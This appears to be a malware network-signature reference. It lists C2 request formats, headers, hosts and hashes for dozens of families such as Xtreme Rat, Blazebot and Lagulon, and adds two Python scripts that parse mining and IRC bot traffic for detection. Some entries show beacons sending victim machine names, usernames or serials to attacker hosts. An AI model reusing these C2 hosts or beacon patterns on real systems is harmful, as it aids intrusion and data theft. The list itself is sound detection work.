Xtreme Rat GET /1234567890.functions .functions "Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: shittway.zapto.org:336
Connection: Keep-Alive
Cache-Control: no-cache

S.T.A.R.T.S.E.R.V.E.R.B.U.F.F.E.R..fm.......A.(.d,_.. .,T..N...............q>" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; . NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 336 DAEBFDED736903D234214ED4821EAF99
family: Xtreme Rat
method: GET
uri: /1234567890.functions
path2: .functions
header:
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)
    Host: 172.16.1.1:4000
    Connection: Keep-Alive
ua: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)
port: 4000

family: Zeus Gameover
method: GET
uri: /search.php?page=73a07bcb51f4be71
path2: /search.php?page=
header:
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
    Host: telecrop.com
    Connection: Keep-Alive
ua: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
ref_url: http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html

family: BitcoinMiner
method: POST
uri: {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}
header (Stratum exchange, one JSON object per line):
    {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}
    {"error": null, "id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f80e8a14", 4]}
    {"params": [63], "id": null, "method": "mining.set_difficulty"}
    {"params": ["8de", "72216db0a2e9151d8b8172470729848cbeecf1080cb8f37f65d047efb2c749f3", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2303122606062f503253482f04a5c4035208", "092f7374726174756d2f000000000100fb422a010000001976a9143c5adb00f1457309f084675941f114b8c09b6af188ac00000000", ["fc25ce83ea8ce3200ed2f56e7cf1ec43a8837118ddd965759c8fbe4d12a04f82", "ee78512684f4bb06bcbed1aa01703e10bbb733dc16cccaf387df0b18f656f234"], "00000001", "1b4e2a39", "5203c4a4", true], "id": null, "method": "mining.notify"}
    {"id": 2, "method": "mining.authorize", "params": ["hitmanuk.4", "123"]}
ua: none in request but file strings: User-Agent: suckergo/2.3.2
port: 9000
md5s: e2c655db1ccd3a632ded94eacb933643 = part of f865c199024105a2ffdf5fa98f391d74 dropper - downloaded by Blazebot DBAF6F1D0EAAB5DC0C88B9CEEC9EA95E
ref_url: http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot
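The BitcoinMiner row above is a Stratum session: newline-delimited JSON-RPC in which the client's software string, the worker credentials, the difficulty and the job parameters are all sent in the clear, so they can be pulled out of a captured stream without any decoding. The Python below is an added example written for this listing (not code from the page's sources or from the miner); its sample input is the five captured lines, rebuilt as a constant with the coinbase zero run written out as 32 zero bytes, and the helper names are my own. It classifies each message, pairs the subscribe response with its request, decodes the job's ntime and lifts the pool's ASCII tags out of the coinbase script, which is often the quickest way to tell which pool software a miner is talking to.

```python
import json
from typing import Any, Dict, List

# Constructed sample: the five Stratum lines captured in the BitcoinMiner row above,
# one JSON-RPC object per line as the protocol puts them on the wire. Coinbase part 1
# is written as version + input count + 32 zero bytes + 0xffffffff + script.
COINB1 = "0100000001" + "00" * 32 + "ffffffff2303122606062f503253482f04a5c4035208"
COINB2 = "092f7374726174756d2f000000000100fb422a010000001976a9143c5adb00f1457309f084675941f114b8c09b6af188ac00000000"
STRATUM_CAPTURE = "\n".join([
    '{"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}',
    '{"error": null, "id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f80e8a14", 4]}',
    '{"params": [63], "id": null, "method": "mining.set_difficulty"}',
    ('{"params": ["8de", "72216db0a2e9151d8b8172470729848cbeecf1080cb8f37f65d047efb2c749f3", "'
     + COINB1 + '", "' + COINB2 + '", '
     '["fc25ce83ea8ce3200ed2f56e7cf1ec43a8837118ddd965759c8fbe4d12a04f82", '
     '"ee78512684f4bb06bcbed1aa01703e10bbb733dc16cccaf387df0b18f656f234"], '
     '"00000001", "1b4e2a39", "5203c4a4", true], "id": null, "method": "mining.notify"}'),
    '{"id": 2, "method": "mining.authorize", "params": ["hitmanuk.4", "123"]}',
])


def parse_stratum(stream: str) -> List[Dict[str, Any]]:
    """Split a TCP payload into JSON-RPC messages and label each one.

    Lines that are not JSON objects are skipped rather than aborting, so a
    stream that starts mid-message or carries junk still yields what it can.
    """
    messages = []
    for line in stream.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except ValueError:
            continue
        if not isinstance(obj, dict):
            continue
        if "method" in obj:
            # Server-pushed notifications carry id null; client requests carry an id.
            obj["_kind"] = "notification" if obj.get("id") is None else "request"
        elif "result" in obj or "error" in obj:
            obj["_kind"] = "response"
        else:
            continue
        messages.append(obj)
    return messages


def looks_like_stratum(stream: str) -> bool:
    """True when at least one mining.* request is present: the port (9000 here)
    says nothing, the method names do."""
    return any(str(m.get("method", "")).startswith("mining.") for m in parse_stratum(stream))


def ascii_tags(hexstr: str, min_len: int = 4) -> List[str]:
    """Printable runs inside the coinbase script; pools tag blocks with strings
    such as /P2SH/ or /stratum/, which identify the pool software."""
    raw = bytes.fromhex(hexstr)
    tags, run = [], bytearray()
    for b in raw + b"\x00":            # the sentinel flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                tags.append(run.decode("ascii"))
            run = bytearray()
    return tags


def summarize(messages: List[Dict[str, Any]]) -> Dict[str, Any]:
    """Pull the indicators an analyst wants out of a parsed exchange."""
    summary: Dict[str, Any] = {}
    pending: Dict[Any, str] = {}       # request id -> method, to pair responses
    for m in messages:
        kind = m["_kind"]
        if kind == "response":
            method = pending.pop(m.get("id"), None)
            result = m.get("result")
            if method == "mining.subscribe" and isinstance(result, list) and len(result) >= 3:
                summary["extranonce1"] = result[1]
                summary["extranonce2_size"] = result[2]
            continue
        method, params = m["method"], m.get("params") or []
        if kind == "request":
            pending[m.get("id")] = method
        if method == "mining.subscribe" and params:
            summary["client"] = params[0]              # miner software string
        elif method == "mining.authorize" and len(params) >= 2:
            summary["worker"], summary["password"] = params[0], params[1]
        elif method == "mining.set_difficulty" and params:
            summary["difficulty"] = params[0]
        elif method == "mining.notify" and len(params) >= 8:
            # job_id, prevhash, coinb1, coinb2, merkle_branch, version, nbits, ntime, clean_jobs
            summary["job_id"] = params[0]
            summary["ntime"] = int(params[7], 16)      # block time the pool is working on
            summary["coinbase_tags"] = ascii_tags(params[2] + params[3])
    return summary


if __name__ == "__main__":
    print("stratum:", looks_like_stratum(STRATUM_CAPTURE))
    for k, v in sorted(summarize(parse_stratum(STRATUM_CAPTURE)).items()):
        print(f"{k}: {v}")
```

Run it as-is and it reports the worker `hitmanuk.4`, difficulty 63 and the `/P2SH/` and `/stratum/` tags; point `parse_stratum` at the reassembled payload of any suspicious long-lived TCP session and `looks_like_stratum` gives you a port-independent check.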
family: Blazebot
method: IRC
uri:
    NICK USA|94576
    USER vtptdwd 0 0 :USA|94576
header:
    NICK USA|94576
    USER vtptdwd 0 0 :USA|94576
    :DIE.Blazed-IRC.com NOTICE AUTH :*** Looking up your hostname...
    :DIE.Blazed-IRC.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    :DIE.Blazed-IRC.com NOTICE USA|94576 :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5FC26DC1 or /raw pong 5FC26DC1 now.
    PING :5FC26DC1
    PONG :5FC26DC1
    JOIN #fkyou# stay0ut
    :DIE.Blazed-IRC.com 001 USA|94576 :Welcome to the Blazed-IRC IRC Network USA|94576!vtptdwd@[victimIp]
port: 6667
ref_url: http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot
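The Blazebot exchange above is ordinary IRC, and what gives the bot away is not the protocol but the registration details: a nick built as country code plus number, a USER realname that just repeats the nick, and a JOIN to a keyed channel straight after the server welcome. The Python below is an added example for this listing, not the bot's or Lavasoft's code; the capture is the nine lines from the row, the regex for the nick shape and the two-flag threshold are heuristics chosen here, and the function names are mine.

```python
import re
from typing import Any, Dict, List, Optional, Tuple

# Constructed sample: the Blazebot client/server lines from the row above, one IRC
# message per line. Lines starting with ":DIE.Blazed-IRC.com" are the server's side.
IRC_CAPTURE = "\n".join([
    "NICK USA|94576",
    "USER vtptdwd 0 0 :USA|94576",
    ":DIE.Blazed-IRC.com NOTICE AUTH :*** Looking up your hostname...",
    ":DIE.Blazed-IRC.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead",
    ":DIE.Blazed-IRC.com NOTICE USA|94576 :*** If you are having problems connecting due to ping timeouts, "
    "please type /quote pong 5FC26DC1 or /raw pong 5FC26DC1 now.",
    "PING :5FC26DC1",
    "PONG :5FC26DC1",
    "JOIN #fkyou# stay0ut",
    ":DIE.Blazed-IRC.com 001 USA|94576 :Welcome to the Blazed-IRC IRC Network USA|94576!vtptdwd@[victimIp]",
])

# Heuristic chosen for this example: two or three capitals, a pipe, then digits,
# the shape of USA|94576 (a country code and a number rather than a person's nick).
BOT_NICK_RE = re.compile(r"^[A-Z]{2,3}\|\d{3,}$")


def parse_irc_line(line: str) -> Tuple[Optional[str], str, List[str]]:
    """Split one message into (prefix, COMMAND, params) per RFC 1459 framing:
    optional ':prefix', the command, space-separated params, and an optional
    ':trailing' param that may itself contain spaces."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if trailing is not None:
        parts.append(trailing)
    return prefix, parts[0].upper(), parts[1:]


def analyze_session(capture: str) -> Dict[str, Any]:
    """Walk the client and server lines of one connection and collect what
    the bot told the server about itself, plus the oddities worth flagging."""
    session: Dict[str, Any] = {"nick": None, "ident": None, "realname": None, "channel": None,
                               "key": None, "server": None, "pings_answered": 0, "flags": []}
    outstanding = set()                       # PING tokens not yet answered
    for raw in capture.splitlines():
        if not raw.strip():
            continue
        prefix, cmd, params = parse_irc_line(raw)
        if cmd == "NICK" and params:
            session["nick"] = params[0]
        elif cmd == "USER" and len(params) >= 4:
            session["ident"], session["realname"] = params[0], params[3]
        elif cmd == "JOIN" and params:
            session["channel"] = params[0]
            session["key"] = params[1] if len(params) > 1 else None
        elif cmd == "PING" and params:
            outstanding.add(params[-1])
        elif cmd == "PONG" and params and params[-1] in outstanding:
            outstanding.discard(params[-1])
            session["pings_answered"] += 1    # the client keeps the C2 link alive
        elif cmd == "001" and prefix:
            session["server"] = prefix        # server name from the welcome numeric
    flags = session["flags"]
    if session["nick"] and BOT_NICK_RE.match(session["nick"]):
        flags.append("nick is <COUNTRY>|<number>")
    if session["realname"] and session["realname"] == session["nick"]:
        flags.append("realname copies nick")
    if session["key"]:
        flags.append("joined a keyed channel")
    return session


def is_bot_like(session: Dict[str, Any]) -> bool:
    """Two independent oddities is the threshold used here; tune it against
    whatever legitimate IRC traffic your network actually carries."""
    return len(session["flags"]) >= 2


if __name__ == "__main__":
    s = analyze_session(IRC_CAPTURE)
    print(s["nick"], s["channel"], s["key"], s["server"], s["flags"], is_bot_like(s))
```

The parser handles the trailing parameter properly, so the server's NOTICE text (which contains spaces and the ping token) does not corrupt the fields; if you feed it a stream reassembled from a pcap, strip the CRLF first, which `splitlines()` does.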
family: Nurjax Adware
method: GET
uri: /services/rules.txt?dummy=916
path2: /rules.txt?dummy=
port: 80
ref_url: http://www.symantec.com/security_response/writeup.jsp?docid=2014-121000-1027-99&tabid=2

family: Tosct
method: GET
uri: Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tDnEsVEiZEgOaQwpn1RARQDujk5Hr9SUuFwP4oIvv2mp7HEF1VTXRemWB5MkE8mxcxRmV
path2: Y3vaR7-V0Vj6gdni
port: 8000
md5s: BDD2AD4C0E1E5667D117810AE9E36C4B
ref_url: http://www.threatexpert.com/report.aspx?md5=bdd2ad4c0e1e5667d117810ae9e36c4b
    http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor:Win32/Tosct.A#tab=2

family: Nocpos
method: GET / POST
uri:
    /check/echo
    /check
path2: /check
header:
    POST /check HTTP/1.1
    User-Agent: something
    Content-Type: application/x-www-form-urlencoded
    Host: support.wordpress-dark.com
    Content-Length: 35
    Cache-Control: no-cache
    Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175

    address=08-00-27-68-68-B9&dt1=&dt2=
ua: something
port: 80
ref_url: http://virustotal.com/en/file/09ca7be86f517f2e3238e1d52115d29fb2dd079a4d9fc60c18ddc823c137a940/analysis/

family: OnionDuke
method: GET
uri:
    /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg=
    s/sysinfo_7.php
    /forum/phpBB3/prx_26.php
path2:
    /phpBB3/
    /sysinfo_7.php
header:
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: rombeast.site50.net
    Cache-Control: no-cache
ua: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
port: 80
md5s: 28f96a57fa5ff663926e9bad51a1d0cb
ref_url: https://www.f-secure.com/v-descs/backdoor_w32_onionduke.shtml

family: Lagulon (Operation Cleaver)
method: POST
uri:
    /contador/server.php
    /i/server.php
    /includes/server.php
path2: /server.php
header:
    POST /contador/server.php HTTP/1.1
    Content-Disposition: inline; comp=<PC-NAME>; account=<USERNAME>; product=3;
    User-Agent: Mozilla/5.0
    Host: halon.com.br
    Content-Length: 0
    Cache-Control: no-cache
ua: Mozilla/5.0
port: 80
ref_url: https://www.virustotal.com/en/file/e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53/analysis/
    http://telussecuritylabs.com/threats/show/TSL20141210-04

family: Medusa
method: POST
uri:
    %s/bbc_mirror/%s/search?id=%s
    /CNN_Mirror/EN/%s/search?id=%s
    |00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|00|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00  (UTF-16LE "Under Construction" in Snort hex notation)
path2: _mirror/%s/search?id=
md5s: f8f74f17af1e3069bf780824ba26b33f
    3c0a2d353461c32a5f34e931e9aba71d
ref_url: http://totalhash.com/analysis/820ea0a145f7c9ee7fa99176c5d59d5f20ada310
family: Toopu
method: GET
uri:
    /toopu.png
    /%s:1048%s
    /num3.html
    /web/get_ad3.asp?type=loadall&machinename=<MACHINE_NAME>-6C78A9C3&cr=yes
    /num3_51la.asp
path2: /toopu.png
header:
    GET /toopu.png HTTP/1.1
    Accept: */*
    Referer:
    Accept-Language: zh-cn
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
    Host: 174.128.244.58
    Connection: Keep-Alive
    Cookie:
ua: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
port: 808

family: Twerkin
method: GET
uri:
    /classes/functions.php?functionname=online
    /classes/functions.php?functionname=getupdates
    /classes/functions.php?functionname=getcommand
path2: /classes/functions.php?functionname=
header:
    Host: nettwerk.x10.mx
    Connection: Keep-Alive
port: 80
md5s: a27721f3b9566601030daab58c092c14
ref_url: http://telussecuritylabs.com/threats/show/TSL20141231-03

family: TzeeBot / TinyZBot
method: POST
uri: /checkupdate.asmx
path2: /checkupdate.asmx
header:
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/GetServerTime"
    Host: 95.211.241.249
    Content-Length: 291
    Expect: 100-continue
    Connection: Keep-Alive
ua: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
md5s: 96e372dea573714d34e394550059b1d7

family: XLS URLDownloadToFileA function for Dridex
method: GET
uri: /koh/mui.php
path2: /mui.php
port: 8080
md5s: 34fa02bb258c93cdf17cb49f25bc0866

family: Quervar / Induc.C / Dorifel
method: GET
uri:
    /js/way.php?00021708&pin=7DF38AD66C78A9C3
    /404/way.php?00038F50&pin=7DF38AD66C78A9C3
    /test/php/way.php?0002E170&pin=7DF38AD66C78A9C3
    /1.php?JXU9WXFG&pin=DEC09603F4CEFD80
path2: &pin=
header:
    GET /1.php?JXU9WXFG&pin=DEC09603F4CEFD80 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MASP)
    Host: greatnewidea1.ru
    Connection: Keep-Alive
ua: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
port: 52466
md5s: 2b62b641bcb2aebef64632cbf0dd37cf
ref_url: http://www.welivesecurity.com/2012/08/21/quervar-induc-c-reincarnate/
    http://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/115/the-significance-of-quervar
    https://www.virustotal.com/en/file/98370c3710c7c4fc8a50b0804c00a9a27d5f93e166a4aa739073febdf894a879/analysis/
family: Feidowns downloader / Kilim (?) / Cracktools
method: GET
uri:
    yeniadmin.php?os=WindowsXP
    /yeniadmin.php?os=Windows7&osbit=64&antiv
    /yeniadmin.php?os=Windows7&osbit=64&antiv=Nonti&kart=KotuKart&core=2&mhz=HIZLI
    http://whos.amung.us/pingjs/?k=yenikazi
path2:
    .php?os=
    &kart=KotuKart&core
header:
    GET /yeniadmin.php?os=WindowsXP&osbit=32&antiv=Nonti&kart=KotuKart&core=1&mhz=HIZLI HTTP/1.1
    User-Agent: Access
    Host: feidowns.com
ua: Access
port: 80
md5s: 2b62b641bcb2aebef64632cbf0dd37cf

family: GameVance Adware
method: GET
uri: /aj/updtah.php
path2: /updtah.php
port: 80
md5s: 1e78fe18d2e2077ae991a9e4e93d2a7c
ref_url: https://malwr.com/analysis/N2MzNzdhODJhZWIxNGRmNTk5ZmUwMTUzZWE0OWI1Mjc/

family: OpenShopper Adware
method: GET
uri:
    //mmsv/Access3.php
    //opendb/mmsv.php
    //mmsv/Access2.php
    /opapp/postmedia1/Update.dat
    /opapp/postmedia1/OKUpdate.exe
path2:
    mmsv
    opapp
port: 80
md5s: 38F2EFA2D40FF3ACF0C57CB4B59A250E
ref_url: http://www.threatexpert.com/report.aspx?md5=38f2efa2d40ff3acf0c57cb4b59a250e

family: SoftPulse Adware
method: GET
uri: /c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_IaUehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJEkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJtiH8n4I81acQHcoYVRgaYP43_wbgv6_2Vf3NfFqPD7vqcR-i0sYMo4Qppk0aw?sbb=%5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cca6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27www.r7wti7bwji.com%27%5D&sbb_check=%5B%271%27%5D&fileName=%5B%27Setup%27%5D
port: 80
md5s: c04017a08f3e4cebd9b7b20308ee8257

family: FakeAV
method: GET
uri:
    /[...]/load.php?file=uploader
    /[...]/load.php?file=grabbers
    /[...]/load.php?file=1
    /ohwgx3kiTh/document.doc
    /ohwgx3kiTh/load.php?file=0
path2: load.php?file=
port: 80
ref_url: https://www.f-secure.com/v-descs/trojan-downloader_w32_kdv176347.shtml

family: Wauchos (download by Zbot of Cridex)
method: POST
uri:
    /ssdc32716372/file.php
    /auto*.it/*/jeve.exe
    //dd*.ru/old.exe
path2: /ssdc32716372/file.php
header:
    POST /ssdc32716372/file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
    Host: 188.225.72.229
    Content-Length: 128
    Connection: Keep-Alive
    Cache-Control: no-cache

    .(c...<..T3..DE._..p.[..f12...j.P.....i...G.,(....Y5y...........s..,..,u...n0...].S.....n._X$...E.3Y.Z8.....hY.xJ..*..WN.FNE.V.  (binary body; non-printable bytes shown as dots)
ua: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
port: 80
md5s: 0d8d7a8074ee36a626d086f02490aaab
ref_url: https://www.f-secure.com/weblog/archives/00002759.html

family: Blackenergy DDoS Bot
method: POST
uri (request body formats):
    id=[bot_id]&bid=[base64_encoded_build_id]&dv=[x]&mv=[y]&dpv=[z]
    id=[bot_id_sha1]&bid=[base64_encoded_build_id]&nm=[x]&cn=[y]&num=[z]
    The only major difference is that the id field contains just the hash instead of the actual string.
ref_url: https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf
family: Alurewo / Alureon pay per click
method: GET
uri: /click.php?c=f39daf0d969abd8fe186a9656341ed05a43d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7f11fa545f5e2926f54123019882b9a3fc4a6a6b711ae23b8587d1f45d7324667bb5f3e447f05b43c5
path2: /click.php?c=
header:
    GET /click.php?c=f39daf0d969abd8fe186a9656341ed05a43d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7f11fa545f5e2926f54123019882b9a3fc4a6a6b711ae23b8587d1f45d7324667bb5f3e447f05b43c5 HTTP/1.1
    Accept: */*
    Referer: http://retravopoytem.com/search.php
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 184.164.143.90
    Connection: Keep-Alive
ua: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
port: 80
ref_url: http://www.malware-traffic-analysis.net/2014/06/24/index2.html

family: OSX Wirelurker
method: GET
uri: /mac/getversion.php?sn=<SN>
path2: /getversion.php?sn=
header:
    GET /mac/getversion.php?sn=C02N9LBSG083 HTTP/1.1
    Host: www.comeinbaby.com
    Accept-Language: zh-Hans, en, en-us
    User-Agent: globalupdate (unknown version) CFNetwork/720.2.4 Darwin/14.1.0 (x86_64)
    Connection: keep-alive
ua: globalupdate (unknown version) CFNetwork/720.2.4 Darwin/14.1.0 (x86_64)
port: 80
ref_url: www.virustotal.com/en/file/93856f704db2efe2e2262e6c710a23d03d6b0748c02e4d5d8d2d4e25f56a8b32/analysis/

family: Systweak Adware - Systweak RegClean P &amp; Advanced System Protector
method: GET
uri: /getipaddress.asp
path2: /getipaddress.asp
header:
    GET /getipaddress.asp HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
    Host: www.k9pcfixer.com
    Connection: Keep-Alive
ua: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
port: 80
md5s: 0ae593e18649d696ed578e792b75558d
ref_url: https://www.virustotal.com/en/file/82fc51cbdee9cf104af95a94415ff48190f55dc9ddf2de003753cbac099d392c/analysis/

family: MPlug / Multiplug Adware
method: GET
uri: /?step_id=1&sf=1&installer_id=8605008392702878770&publisher_id=2356&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=7371188128136903471&external_id=0&installer_type=IX_2013&hardware_id=15979643602580996082&session_id=17077067485576374638&installer_file_name=Doctorow%2C+E+L+-+3+books+.rar&filesize=4.5+MB&product_name=TusFiles&product_title=Doctorow%2C+E+L+-+3+books+.rar&product_download_url=http%3A%2F%2Fk.tusfiles.net%2Fd%2F74la37ldtz2fvxijot2ypuiocogpoue4j7hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+-+3+books+.rar&product_file_name=Doctorow%2C+E+L+-+3+books+.rar&project_encode_id=2356&ttl=1422295723363&isRedirected=1&enc_u_p=1&st=0&IX_Startapp=1&self_redirect=0&st=0&reffer=http%3A%2F%2Ftusfiles.net%2F&for_html_installer=1&layout_id=8&project_name=TusFiles&uuid=%252A
path2: /?step_id=1&sf=1&
header:
    GET /?step_id=1&sf=1&installer_id=8605008392702878770&publisher_id=2356&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=7371188128136903471&external_id=0&installer_type=IX_2013&hardware_id=15979643602580996082&session_id=17077067485576374638&installer_file_name=Doctorow%2C+E+L+-+3+books+.rar&filesize=4.5+MB&product_name=TusFiles&product_title=Doctorow%2C+E+L+-+3+books+.rar&product_download_url=http%3A%2F%2Fk.tusfiles.net%2Fd%2F74la37ldtz2fvxijot2ypuiocogpoue4j7hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+-+3+books+.rar&product_file_name=Doctorow%2C+E+L+-+3+books+.rar&project_encode_id=2356&ttl=1422295723363&isRedirected=1&enc_u_p=1&st=0&IX_Startapp=1&self_redirect=0&st=0&reffer=http%3A%2F%2Ftusfiles.net%2F&for_html_installer=1&layout_id=8&project_name=TusFiles&uuid=%252A HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
    Host: c1.diriginal.org
    Cache-Control: no-cache
ua: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
port: 80
md5s: 2ea0bcb1ca764a01571a09208e892199
ref_url: https://www.virustotal.com/en/file/d0a87d7b635d2313c1b4011e38c70e3c080bdf08be4d7a36344119d2c6e84ee6/analysis/

family: Nemucod JS
method: GET
uri: /document.php?id=5451565E011705000B120124031309050D084A0313114A010011&rnd=2129391
path2: /document.php?id=
header:
    GET /document.php?id=5451565E011705000B120124031309050D084A0313114A010011&rnd=2129391 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 64.239.7.212
    Connection: Keep-Alive
ua: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
port: 80
md5s: e77334c5995614fc79f285abca8e14ad
ref_url: https://www.virustotal.com/en/file/6ead063f36bf906ff05055db42c9d7c6acc7d9729179286d8c9b30d52e815def/analysis/1422638297/
family: Andromeda / Wauchos
method: POST
uri: /and/gate.php
path2: /gate.php
header:
    POST /and/gate.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    User-Agent: Mozilla/4.0
    Host: ddnsse3ravis221.com.ua
    Content-Length: 70
    Cache-Control: no-cache
    Pragma: no-cache

    BluO7awLMtZaAIV/b4XorzWUEUS000s6jUz7rTt5FY0uIjIc2nZdut5ZShu4vUIzus4=
ua: Mozilla/4.0
port: 80
md5s: 607a24ccf8a82796384ae113f29e6ab5
ref_url: https://www.virustotal.com/en/file/11f6c17e317e02b71888133656029a322da6ada5f9f11cdfd90127aca0ff6a2a/analysis/

family: Poweliks click-fraud
method: GET
uri: /click?sid=8f75f821c687855c53899112090ed27514c749fdcid=0
path2: /click?sid=
port: 80
ref_url: http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malicious-url/6528

family: Poweliks click-fraud
method: GET
uri: /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1c105d8c9
path2: /click.php?c=
port: 80
ref_url: http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malicious-url/6528

family: Yoddos / Darkshell / YoYoDDoS
